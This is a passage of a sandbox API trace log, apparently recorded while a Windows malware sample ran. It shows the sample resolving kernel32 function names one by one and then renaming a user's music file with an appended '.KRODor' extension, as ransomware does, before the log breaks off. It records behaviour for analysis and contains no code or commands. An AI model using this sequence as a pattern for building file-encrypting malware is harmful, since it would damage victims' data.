lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.782] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.782] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.782] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.782] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.782] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.782] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.782] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.782] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.783] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.783] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.783] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.783] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.783] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.783] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.783] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.783] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.783] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.783] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.783] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.783] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.783] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.783] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.783] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.783] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.783] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.783] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.783] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.784] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.784] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.784] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.784] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.784] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.784] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.784] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.784] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.784] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.784] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.784] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.784] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.784] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.784] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.784] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.784] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.784] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.784] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.784] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.785] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.785] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.785] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.785] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.785] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.785] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.785] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.785] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.785] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.785] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.785] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.785] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.785] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.785] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.785] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.785] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.785] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.785] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.785] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.786] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.786] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.786] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.786] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.786] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.786] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.786] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.786] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.786] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.786] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.786] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.786] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.786] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.786] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.786] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.786] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.786] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.786] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.786] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.787] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.787] lstrlenA (lpString="DELETEATOM") returned 10 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.787] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.787] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.787] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.787] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.787] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.787] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.787] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.787] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.787] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.787] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.787] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.787] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.787] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.787] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.787] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.787] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.787] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.787] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.788] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.788] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.788] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.788] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.788] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.788] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.788] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.788] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.788] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.788] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.788] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.788] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.788] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.788] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.788] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.788] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.788] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.788] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.788] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.789] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.789] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.789] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.789] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.789] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.789] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.789] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.789] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.789] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.789] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.789] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.789] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\MculZic-sh 2UCGOPTG.mp3") returned 84 [0085.789] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\MculZic-sh 2UCGOPTG.mp3.KRODor") returned 91 [0085.789] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\MculZic-sh 2UCGOPTG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\mculzic-sh 2ucgoptg.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\MculZic-sh 2UCGOPTG.mp3.KRODor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\mculzic-sh 